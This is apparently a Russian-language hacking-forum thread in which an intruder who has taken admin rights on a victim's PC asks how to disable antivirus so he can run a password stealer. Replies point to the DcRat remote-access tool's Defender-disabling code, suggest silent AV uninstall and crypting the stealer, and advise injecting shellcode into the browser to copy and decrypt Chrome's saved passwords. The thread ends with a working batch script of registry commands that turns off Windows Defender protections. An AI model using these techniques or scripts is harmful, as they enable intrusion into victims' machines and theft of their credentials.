Зашел в пк жертвы, получил админские права. Как отключить антивирус с помощью powershell, дефендер без проблем получилось, а вот с АВ не получается.
Спасибо за инфу, но тут только как дефендер отключатьзагляни в ресурсы плагина там есть код![]()
DcRat/Plugin/Extra/Extra/Handler/HandleDisableDefender.cs at main · qwqdanchun/DcRat
A simple remote tool in C#. Contribute to qwqdanchun/DcRat development by creating an account on GitHub.github.com
другие AV ты не отключишь просто такСпасибо за инфу, но тут только как дефендер отключать
Да ну... Если есть права админа, можно службу ав локнуть.другие AV ты не отключишь просто так
через диспетчер задач не получаетсяДа ну... Если есть права админа, можно службу ав локнуть.
Да-да, конечно, так тебе авер позволил службу отключить, все дрова выгрузить из ядра, тут только если новогоднее настроение поможет, да и то не факт. Намекну на одну вещь, она может и будет работать только в частных случаях, а не в общем случае, но все равно. Если найдешь установщик этой конкретной установленной версии авера, то у них иногда бывает ключик командной строки для сайлент деинсталляции, но это любая прокладка между монитором и креслом может заметить и охереть с такой наглости, очень грязное решение.Да ну... Если есть права админа, можно службу ав локнуть
ну а есть еще какие то способы? Тоесть попасть в систему я попал, рут взял, теперь стилак хочу загрузить но ебан#й аваст мешает, это к примеру, что я могу сделать, кроме того что "сделать охуенный крипт стилака чтобы был фуд рантайма и скантайма"Да-да, конечно, так тебе авер позволил службу отключить, все дрова выгрузить из ядра, тут только если новогоднее настроение поможет, да и то не факт. Намекну на одну вещь, она может и будет работать только в частных случаях, а не в общем случае, но все равно. Если найдешь установщик этой конкретной установленной версии авера, то у них иногда бывает ключик командной строки для сайлент деинсталляции, но это любая прокладка между монитором и креслом может заметить и охереть с такой наглости, очень грязное решение.
Не поможет. Аваст детектит чтение БД браузеров не из процесса самого браузера.кроме того что "сделать охуенный крипт стилака чтобы был фуд рантайма и скантайма"
А что делать тогда?Не поможет. Аваст детектит чтение БД браузеров не из процесса самого браузера.
У меня был систем доступ, ловил av block exec. Так и не обошел. Забил х#й потом просто и все. Кроме нормального крипта никак не обойти.ну а есть еще какие то способы?
Инжекти шеллкод в процесс браузера, копируй БД (Login Data в случае хрома содержит пароли), расшифровывай.А что делать тогда?
Как теперь развидеть историю охеревания прокладки ?))))))Да-да, конечно, так тебе авер позволил службу отключить, все дрова выгрузить из ядра, тут только если новогоднее настроение поможет, да и то не факт. Намекну на одну вещь, она может и будет работать только в частных случаях, а не в общем случае, но все равно. Если найдешь установщик этой конкретной установленной версии авера, то у них иногда бывает ключик командной строки для сайлент деинсталляции, но это любая прокладка между монитором и креслом может заметить и охереть с такой наглости, очень грязное решение.
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f